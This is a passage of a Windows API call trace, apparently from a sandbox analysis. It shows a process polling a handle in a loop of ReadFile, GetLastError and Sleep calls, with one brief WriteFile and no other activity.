	[0209.899] Sleep (dwMilliseconds=0xa) 
	[0209.946] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.946] GetLastError () returned 0x218
	[0209.946] Sleep (dwMilliseconds=0xa) 
	[0209.976] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.976] GetLastError () returned 0x218
	[0209.976] Sleep (dwMilliseconds=0xa) 
	[0209.992] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0209.992] GetLastError () returned 0x218
	[0209.992] Sleep (dwMilliseconds=0xa) 
	[0210.008] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.008] GetLastError () returned 0x218
	[0210.008] Sleep (dwMilliseconds=0xa) 
	[0210.024] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.024] GetLastError () returned 0x218
	[0210.024] Sleep (dwMilliseconds=0xa) 
	[0210.044] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.044] GetLastError () returned 0x218
	[0210.044] Sleep (dwMilliseconds=0xa) 
	[0210.055] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.055] GetLastError () returned 0x218
	[0210.055] Sleep (dwMilliseconds=0xa) 
	[0210.071] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.071] GetLastError () returned 0x218
	[0210.071] Sleep (dwMilliseconds=0xa) 
	[0210.104] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.104] GetLastError () returned 0x218
	[0210.104] Sleep (dwMilliseconds=0xa) 
	[0210.148] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.148] GetLastError () returned 0x218
	[0210.148] Sleep (dwMilliseconds=0xa) 
	[0210.185] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.185] GetLastError () returned 0x218
	[0210.185] Sleep (dwMilliseconds=0xa) 
	[0210.195] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.195] GetLastError () returned 0x218
	[0210.195] Sleep (dwMilliseconds=0xa) 
	[0210.211] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.211] GetLastError () returned 0x218
	[0210.211] Sleep (dwMilliseconds=0xa) 
	[0210.227] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.227] GetLastError () returned 0x218
	[0210.227] Sleep (dwMilliseconds=0xa) 
	[0210.243] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.243] GetLastError () returned 0x218
	[0210.243] Sleep (dwMilliseconds=0xa) 
	[0210.258] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.258] GetLastError () returned 0x218
	[0210.258] Sleep (dwMilliseconds=0xa) 
	[0210.273] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.273] GetLastError () returned 0x218
	[0210.273] Sleep (dwMilliseconds=0xa) 
	[0210.289] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.289] GetLastError () returned 0x218
	[0210.289] Sleep (dwMilliseconds=0xa) 
	[0210.335] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.335] GetLastError () returned 0x218
	[0210.335] Sleep (dwMilliseconds=0xa) 
	[0210.382] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.382] GetLastError () returned 0x218
	[0210.382] Sleep (dwMilliseconds=0xa) 
	[0210.407] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.407] GetLastError () returned 0x218
	[0210.407] Sleep (dwMilliseconds=0xa) 
	[0210.413] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.413] GetLastError () returned 0x218
	[0210.413] Sleep (dwMilliseconds=0xa) 
	[0210.436] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.437] GetLastError () returned 0x218
	[0210.437] Sleep (dwMilliseconds=0xa) 
	[0210.445] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.445] GetLastError () returned 0x218
	[0210.445] Sleep (dwMilliseconds=0xa) 
	[0210.461] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.461] GetLastError () returned 0x218
	[0210.461] Sleep (dwMilliseconds=0xa) 
	[0210.476] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.476] GetLastError () returned 0x218
	[0210.476] Sleep (dwMilliseconds=0xa) 
	[0210.491] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.492] GetLastError () returned 0x218
	[0210.492] Sleep (dwMilliseconds=0xa) 
	[0210.538] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.538] GetLastError () returned 0x218
	[0210.538] Sleep (dwMilliseconds=0xa) 
	[0210.585] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.585] GetLastError () returned 0x218
	[0210.585] Sleep (dwMilliseconds=0xa) 
	[0210.644] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.644] GetLastError () returned 0x218
	[0210.644] Sleep (dwMilliseconds=0xa) 
	[0210.647] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.648] GetLastError () returned 0x218
	[0210.648] Sleep (dwMilliseconds=0xa) 
	[0210.663] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.663] GetLastError () returned 0x218
	[0210.663] Sleep (dwMilliseconds=0xa) 
	[0210.679] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.679] GetLastError () returned 0x218
	[0210.679] Sleep (dwMilliseconds=0xa) 
	[0210.694] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.694] GetLastError () returned 0x218
	[0210.694] Sleep (dwMilliseconds=0xa) 
	[0210.741] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.741] GetLastError () returned 0x218
	[0210.741] Sleep (dwMilliseconds=0xa) 
	[0210.788] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.788] GetLastError () returned 0x218
	[0210.788] Sleep (dwMilliseconds=0xa) 
	[0210.804] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.804] GetLastError () returned 0x218
	[0210.804] Sleep (dwMilliseconds=0xa) 
	[0210.822] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.822] GetLastError () returned 0x218
	[0210.822] Sleep (dwMilliseconds=0xa) 
	[0210.835] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.835] GetLastError () returned 0x218
	[0210.835] Sleep (dwMilliseconds=0xa) 
	[0210.850] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.850] GetLastError () returned 0x218
	[0210.850] Sleep (dwMilliseconds=0xa) 
	[0210.872] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.872] GetLastError () returned 0x218
	[0210.872] Sleep (dwMilliseconds=0xa) 
	[0210.882] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.882] GetLastError () returned 0x218
	[0210.882] Sleep (dwMilliseconds=0xa) 
	[0210.897] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.898] GetLastError () returned 0x218
	[0210.898] Sleep (dwMilliseconds=0xa) 
	[0210.913] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.913] GetLastError () returned 0x218
	[0210.914] Sleep (dwMilliseconds=0xa) 
	[0210.959] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0210.959] GetLastError () returned 0x218
	[0210.959] Sleep (dwMilliseconds=0xa) 
	[0211.007] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.007] GetLastError () returned 0x218
	[0211.007] Sleep (dwMilliseconds=0xa) 
	[0211.030] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.030] GetLastError () returned 0x218
	[0211.030] Sleep (dwMilliseconds=0xa) 
	[0211.037] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.037] GetLastError () returned 0x218
	[0211.037] Sleep (dwMilliseconds=0xa) 
	[0211.053] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.053] GetLastError () returned 0x218
	[0211.053] Sleep (dwMilliseconds=0xa) 
	[0211.069] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.069] GetLastError () returned 0x218
	[0211.069] Sleep (dwMilliseconds=0xa) 
	[0211.084] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.084] GetLastError () returned 0x218
	[0211.084] Sleep (dwMilliseconds=0xa) 
	[0211.100] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.100] GetLastError () returned 0x218
	[0211.100] Sleep (dwMilliseconds=0xa) 
	[0211.116] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.116] GetLastError () returned 0x218
	[0211.116] Sleep (dwMilliseconds=0xa) 
	[0211.131] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.131] GetLastError () returned 0x218
	[0211.131] Sleep (dwMilliseconds=0xa) 
	[0211.178] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.178] GetLastError () returned 0x218
	[0211.178] Sleep (dwMilliseconds=0xa) 
	[0211.225] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.226] GetLastError () returned 0x218
	[0211.226] Sleep (dwMilliseconds=0xa) 
	[0211.271] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.271] GetLastError () returned 0x218
	[0211.271] Sleep (dwMilliseconds=0xa) 
	[0211.287] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.287] GetLastError () returned 0x218
	[0211.287] Sleep (dwMilliseconds=0xa) 
	[0211.303] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.303] GetLastError () returned 0x218
	[0211.303] Sleep (dwMilliseconds=0xa) 
	[0211.319] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0211.319] GetLastError () returned 0x218
	[0211.319] Sleep (dwMilliseconds=0x3e8) 
	[0212.349] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0212.349] Sleep (dwMilliseconds=0xa) 
	[0212.395] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.395] GetLastError () returned 0x218
	[0212.395] Sleep (dwMilliseconds=0xa) 
	[0212.417] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.417] GetLastError () returned 0x218
	[0212.417] Sleep (dwMilliseconds=0xa) 
	[0212.426] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.426] GetLastError () returned 0x218
	[0212.426] Sleep (dwMilliseconds=0xa) 
	[0212.442] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.442] GetLastError () returned 0x218
	[0212.442] Sleep (dwMilliseconds=0xa) 
	[0212.457] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.457] GetLastError () returned 0x218
	[0212.457] Sleep (dwMilliseconds=0xa) 
	[0212.483] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.483] GetLastError () returned 0x218
	[0212.483] Sleep (dwMilliseconds=0xa) 
	[0212.488] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.488] GetLastError () returned 0x218
	[0212.489] Sleep (dwMilliseconds=0xa) 
	[0212.505] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.505] GetLastError () returned 0x218
	[0212.505] Sleep (dwMilliseconds=0xa) 
	[0212.520] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.520] GetLastError () returned 0x218
	[0212.520] Sleep (dwMilliseconds=0xa) 
	[0212.554] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.554] GetLastError () returned 0x218
	[0212.554] Sleep (dwMilliseconds=0xa) 
	[0212.598] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.598] GetLastError () returned 0x218
	[0212.598] Sleep (dwMilliseconds=0xa) 
	[0212.648] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.648] GetLastError () returned 0x218
	[0212.648] Sleep (dwMilliseconds=0xa) 
	[0212.684] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.684] GetLastError () returned 0x218
	[0212.684] Sleep (dwMilliseconds=0xa) 
	[0212.691] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.691] GetLastError () returned 0x218
	[0212.691] Sleep (dwMilliseconds=0xa) 
	[0212.707] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.707] GetLastError () returned 0x218
	[0212.707] Sleep (dwMilliseconds=0xa) 
	[0212.724] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.724] GetLastError () returned 0x218
	[0212.724] Sleep (dwMilliseconds=0xa) 
	[0212.738] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.738] GetLastError () returned 0x218
	[0212.738] Sleep (dwMilliseconds=0xa) 
	[0212.754] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.755] GetLastError () returned 0x218
	[0212.755] Sleep (dwMilliseconds=0xa) 
	[0212.770] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
